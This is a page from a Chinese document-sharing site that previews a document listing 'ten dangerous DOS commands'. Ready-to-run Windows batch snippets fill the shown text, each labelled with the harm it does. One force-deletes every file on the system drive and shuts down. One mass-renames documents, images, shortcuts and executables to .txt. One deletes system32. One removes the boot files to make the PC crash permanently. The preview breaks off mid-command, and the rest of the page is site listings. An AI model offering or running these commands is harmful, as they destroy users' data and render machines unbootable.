- 1
- 0
- 约2.07千字
- 约 2页
- 2023-02-27 发布于上海
- 举报
记dos⼗个危险指令代码
1. 蓝屏死机(删除所有驱动)
@echo off
del %windowsdrive%\*.*/f/s/q
shutdown -s -f -t 0
原视频⾥是systemdrive
2. 更改⽂件后缀名
Ren *.doc *.txt
Ren *.jpeg *.txt
Ren *.lnk *.txt
Ren *.avi *.txt
Ren *.mpeg *.txt
Ren *.com *.txt
Ren *.bat *.txt
3. 删除system32
Del c:\windows\system32\*.* /q
4. 使PC永久崩溃
@echo off
Attrib -r -s -h c:\autoexec.bat
Del c:\autoexec.bat
Attrib -r -s -h c:\boot.ini
Del c:\boot.ini
Attrib -r -s -h c:\ntldr
Del c:\ ntldr
Attrib -r -s -h c:\windows\win.ini
Del c:\windows\win.i
您可能关注的文档
最近下载
- 2023年咨询工程师现代咨询方法与实务习题班讲义大题.docx
- 世界古代史(第二版)全套PPT课件.pptx
- 2025年设备工程项目管理能力新版真题卷附解析(设备监理师).docx VIP
- 2025年设备监理师《设备工程项目管理》考试试题及答案.docx VIP
- 2024年设备监理师之质量投资进度控制真题精选附答案 .pdf VIP
- Power Up精品教学课件PU1-U1词汇1.pptx VIP
- Power Up精品教学课件PU1-U1词汇2.pptx VIP
- 《中国传统文化课件:雕塑艺术鉴赏》.ppt VIP
- 《开天辟地的大事变》教学课件 - 2026-2027 学年统编版(新教材)小学道德与法治五年级上册.pptx
- 敦煌莫高窟的艺术宝藏课件 .ppt VIP
原创力文档

文档评论(0)